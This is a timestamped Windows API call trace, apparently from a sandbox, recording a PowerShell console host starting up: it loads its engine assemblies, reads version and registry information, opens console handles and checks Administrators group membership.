	[0101.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x447cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0101.223] CoTaskMemFree (pv=0x447cc0) 
	[0101.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.490] SetErrorMode (uMode=0x1) returned 0x1
	[0101.490] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x29ddf0 | out: lpFileInformation=0x29ddf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0101.490] SetErrorMode (uMode=0x1) returned 0x1
	[0101.490] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x29e060 | out: lpdwHandle=0x29e060) returned 0x94c
	[0101.491] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b66708 | out: lpData=0x2b66708) returned 1
	[0101.492] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29dfd8, puLen=0x29dfd0 | out: lplpBuffer=0x29dfd8*=0x2b667a4, puLen=0x29dfd0) returned 1
	[0101.492] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x29df48, puLen=0x29df40 | out: lplpBuffer=0x29df48*=0x2b66880, puLen=0x29df40) returned 1
	[0101.492] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0101.492] CoTaskMemAlloc (cb=0x2e) returned 0x452610
	[0101.492] lstrcpyW (in: lpString1=0x452610, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0101.492] CoTaskMemFree (pv=0x452610) 
	[0101.492] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x29df48, puLen=0x29df40 | out: lplpBuffer=0x29df48*=0x2b668d4, puLen=0x29df40) returned 1
	[0101.492] lstrlenW (lpString="System.Management.Automation") returned 28
	[0101.492] CoTaskMemAlloc (cb=0x3c) returned 0x4639a0
	[0101.492] lstrcpyW (in: lpString1=0x4639a0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0101.492] CoTaskMemFree (pv=0x4639a0) 
	[0101.492] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x29df48, puLen=0x29df40 | out: lplpBuffer=0x29df48*=0x2b66930, puLen=0x29df40) returned 1
	[0101.492] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0101.492] CoTaskMemAlloc (cb=0x20) returned 0x45e3e0
	[0101.492] lstrcpyW (in: lpString1=0x45e3e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0101.492] CoTaskMemFree (pv=0x45e3e0) 
	[0101.492] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x29df48, puLen=0x29df40 | out: lplpBuffer=0x29df48*=0x2b66970, puLen=0x29df40) returned 1
	[0101.492] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0101.493] CoTaskMemAlloc (cb=0x44) returned 0x4639a0
	[0101.493] lstrcpyW (in: lpString1=0x4639a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0101.493] CoTaskMemFree (pv=0x4639a0) 
	[0101.493] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x29df48, puLen=0x29df40 | out: lplpBuffer=0x29df48*=0x2b669d8, puLen=0x29df40) returned 1
	[0101.493] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0101.493] CoTaskMemAlloc (cb=0x76) returned 0x3f32e0
	[0101.493] lstrcpyW (in: lpString1=0x3f32e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0101.493] CoTaskMemFree (pv=0x3f32e0) 
	[0101.493] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x29df48, puLen=0x29df40 | out: lplpBuffer=0x29df48*=0x2b66a74, puLen=0x29df40) returned 1
	[0101.493] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0101.493] CoTaskMemAlloc (cb=0x44) returned 0x4639a0
	[0101.493] lstrcpyW (in: lpString1=0x4639a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0101.493] CoTaskMemFree (pv=0x4639a0) 
	[0101.493] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x29df48, puLen=0x29df40 | out: lplpBuffer=0x29df48*=0x2b66ad8, puLen=0x29df40) returned 1
	[0101.493] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0101.493] CoTaskMemAlloc (cb=0x58) returned 0x3b4660
	[0101.493] lstrcpyW (in: lpString1=0x3b4660, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0101.493] CoTaskMemFree (pv=0x3b4660) 
	[0101.493] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x29df48, puLen=0x29df40 | out: lplpBuffer=0x29df48*=0x2b66b54, puLen=0x29df40) returned 1
	[0101.493] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0101.493] CoTaskMemAlloc (cb=0x20) returned 0x45e3e0
	[0101.493] lstrcpyW (in: lpString1=0x45e3e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0101.493] CoTaskMemFree (pv=0x45e3e0) 
	[0101.493] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x29df48, puLen=0x29df40 | out: lplpBuffer=0x29df48*=0x2b667fc, puLen=0x29df40) returned 1
	[0101.493] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0101.493] CoTaskMemAlloc (cb=0x66) returned 0x458370
	[0101.493] lstrcpyW (in: lpString1=0x458370, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0101.493] CoTaskMemFree (pv=0x458370) 
	[0101.494] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x29df48, puLen=0x29df40 | out: lplpBuffer=0x29df48*=0x0, puLen=0x29df40) returned 0
	[0101.494] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x29df48, puLen=0x29df40 | out: lplpBuffer=0x29df48*=0x0, puLen=0x29df40) returned 0
	[0101.494] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x29df48, puLen=0x29df40 | out: lplpBuffer=0x29df48*=0x0, puLen=0x29df40) returned 0
	[0101.494] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29df18, puLen=0x29df10 | out: lplpBuffer=0x29df18*=0x2b667a4, puLen=0x29df10) returned 1
	[0101.494] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0101.494] VerLanguageNameW (in: wLang=0x0, szLang=0x419e90, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0101.494] CoTaskMemFree (pv=0x419e90) 
	[0101.494] VerQueryValueW (in: pBlock=0x2b66708, lpSubBlock="\\", lplpBuffer=0x29df68, puLen=0x29df60 | out: lplpBuffer=0x29df68*=0x2b66730, puLen=0x29df60) returned 1
	[0101.509] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29de38 | out: phkResult=0x29de38*=0x304) returned 0x0
	[0101.511] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29ddfc, lpData=0x0, lpcbData=0x29ddf8*=0x0 | out: lpType=0x29ddfc*=0x1, lpData=0x0, lpcbData=0x29ddf8*=0x56) returned 0x0
	[0101.512] CoTaskMemAlloc (cb=0x5a) returned 0x458300
	[0101.512] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29ddcc, lpData=0x458300, lpcbData=0x29ddc8*=0x56 | out: lpType=0x29ddcc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x29ddc8*=0x56) returned 0x0
	[0101.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.680] CoTaskMemAlloc (cb=0x104) returned 0x447cc0
	[0101.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x447cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0101.680] CoTaskMemFree (pv=0x447cc0) 
	[0102.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x29d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0102.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x29d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0103.243] CoTaskMemAlloc (cb=0x104) returned 0x46e760
	[0103.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.243] CoTaskMemFree (pv=0x46e760) 
	[0103.244] CoTaskMemAlloc (cb=0x104) returned 0x46e790
	[0103.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.244] CoTaskMemFree (pv=0x46e790) 
	[0103.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x29d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0103.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x29d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0103.727] CoTaskMemAlloc (cb=0x104) returned 0x46e790
	[0103.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.728] CoTaskMemFree (pv=0x46e790) 
	[0103.872] CoTaskMemAlloc (cb=0x104) returned 0x46e790
	[0103.872] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.872] CoTaskMemFree (pv=0x46e790) 
	[0103.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.551] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0107.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.551] CoTaskMemFree (pv=0x46e9b0) 
	[0107.955] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0107.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.955] CoTaskMemFree (pv=0x46e9b0) 
	[0107.956] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0107.956] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.956] CoTaskMemFree (pv=0x46e9b0) 
	[0107.958] CoCreateGuid (in: pguid=0x29e158 | out: pguid=0x29e158*(Data1=0x1db0716d, Data2=0x79d8, Data3=0x4575, Data4=([0]=0xbf, [1]=0x94, [2]=0xcc, [3]=0xf1, [4]=0xda, [5]=0xb3, [6]=0x95, [7]=0xc7))) returned 0x0
	[0108.610] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0108.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.610] CoTaskMemFree (pv=0x46e9b0) 
	[0108.613] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0108.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.613] CoTaskMemFree (pv=0x46e9b0) 
	[0109.020] CoTaskMemAlloc (cb=0x104) returned 0x46e9b0
	[0109.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46e9b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.021] CoTaskMemFree (pv=0x46e9b0) 
	[0109.026] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0109.027] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x29de00 | out: lpConsoleScreenBufferInfo=0x29de00) returned 1
	[0109.032] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0109.032] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x29de00 | out: lpConsoleScreenBufferInfo=0x29de00) returned 1
	[0109.033] GetVersionExW (in: lpVersionInformation=0x29dd90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x29dd90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0109.035] GetCurrentProcess () returned 0xffffffffffffffff
	[0109.036] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x29de28 | out: TokenHandle=0x29de28*=0x320) returned 1
	[0109.040] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x29dd48 | out: TokenInformation=0x0, ReturnLength=0x29dd48) returned 0
	[0109.041] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3c38c0
	[0109.041] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x3c38c0, TokenInformationLength=0x4, ReturnLength=0x29dd48 | out: TokenInformation=0x3c38c0, ReturnLength=0x29dd48) returned 1
	[0109.043] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x29dea8 | out: phNewToken=0x29dea8*=0x31c) returned 1
	[0109.043] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x29dd48 | out: TokenInformation=0x0, ReturnLength=0x29dd48) returned 0
	[0109.043] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3c38f0
	[0109.043] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x3c38f0, TokenInformationLength=0x4, ReturnLength=0x29dd48 | out: TokenInformation=0x3c38f0, ReturnLength=0x29dd48) returned 1
	[0109.044] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2c414b0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x29deb8 | out: IsMember=0x29deb8) returned 1
	[0109.044] CloseHandle (hObject=0x31c) returned 1
	[0109.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0109.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0110.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0111.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
